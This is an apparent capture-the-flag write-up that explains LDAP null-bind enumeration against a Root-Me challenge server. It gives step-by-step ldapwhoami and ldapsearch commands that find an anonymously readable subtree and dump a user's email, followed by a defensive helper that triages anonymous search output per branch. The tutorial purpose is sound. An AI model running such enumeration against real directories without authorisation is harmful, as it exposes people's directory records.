* LDAP null-bind challenge explained simply

Think of LDAP like a big company phonebook/tree. Each node in the tree is a folder or a person record:

#+begin_example
dc=challenge01,dc=root-me,dc=org
|
+-- ou=anonymous
    |
    +-- uid=sabu
        +-- mail: sabu@anonops.org
#+end_example

In this challenge, the server allows *anonymous login* (called a null bind). That means we can connect without a username/password and ask some questions.

** What we did (step by step)

1) Checked if anonymous access works

#+begin_src bash
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
#+end_src

It returned `anonymous`, so null bind is enabled.

2) Tried to list everything from the main base DN

#+begin_src bash
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
#+end_src

Server replied with `Insufficient access`. So: anonymous is allowed, but not everywhere.

3) Probed likely child branches under the base DN

We tested candidate DNs and found one readable branch:

#+begin_src bash
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
#+end_src

That confirmed `ou=anonymous` exists and is accessible.

4) Enumerated that readable branch

#+begin_src bash
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
#+end_src

This returned a user record:

- `uid=sabu`
- `mail: sabu@anonops.org`

So the requested email is: *sabu@anonops.org*

** Why this works

- LDAP permissions are often set per branch (subtree).
- Root/base queries may be blocked.
- A specific subtree can still be world-readable.
- Enumeration is about finding *where* read access is allowed.

** Tiny mental model

#+begin_example
[Connect anonymously] --> [Test base DN] --blocked--> [Try child branches]
                                                              |
                                                              v
                                                   [Find readable subtree]
                                                              |
                                                              v
                                                   [Dump entries + get mail]
#+end_example
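
Added example (not part of the original write-up): a defender-side helper that triages saved anonymous `ldapsearch` output per branch and lists which attributes a null bind exposes, so the per-subtree behaviour described under "Why this works" can be checked on a directory you run. The function names and both sample outputs are constructed for illustration.

```bash
# Added example: triage anonymous (-x, no bind DN) ldapsearch output per branch.
# Function names are illustrative; both sample outputs are constructed.
DENIED_OUT='# search result
search: 2
result: 50 Insufficient access

# numResponses: 1'

READABLE_OUT='dn: uid=sabu,ou=anonymous,dc=challenge01,dc=root-me,dc=org
uid: sabu
mail: sabu@anonops.org

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1'

# Read ldapsearch output on stdin and print a single verdict word.
classify_anon_result() {
  awk '
    /^dn::? /   { entries++ }
    /^result: / { seen = 1; code = $2 + 0 }
    END {
      if (!seen)                     print "no-result"
      else if (code == 0 && entries) print "anonymous-readable"
      else if (code == 0)            print "empty"
      else if (code == 50)           print "denied"
      else                           print "ldap-error-" code
    }'
}

# Print the attribute names an anonymous client received, comma-separated.
exposed_attrs() {
  awk -F: '
    /^# search result/ { exit }
    /^[A-Za-z][A-Za-z0-9;-]*::? / && $1 != "dn" { print $1 }' |
    sort -u | paste -sd, -
}

# branch_report DN OUTPUT -> "DN<TAB>verdict<TAB>attributes"
branch_report() {
  verdict=$(printf '%s\n' "$2" | classify_anon_result)
  attrs=$(printf '%s\n' "$2" | exposed_attrs)
  printf '%s\t%s\t%s\n' "$1" "$verdict" "${attrs:--}"
}
branch_report "dc=challenge01,dc=root-me,dc=org" "$DENIED_OUT"
branch_report "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "$READABLE_OUT"
```

When feeding it live output, run `ldapsearch` without `-LLL`, since that option suppresses the `result:` line the classifier reads.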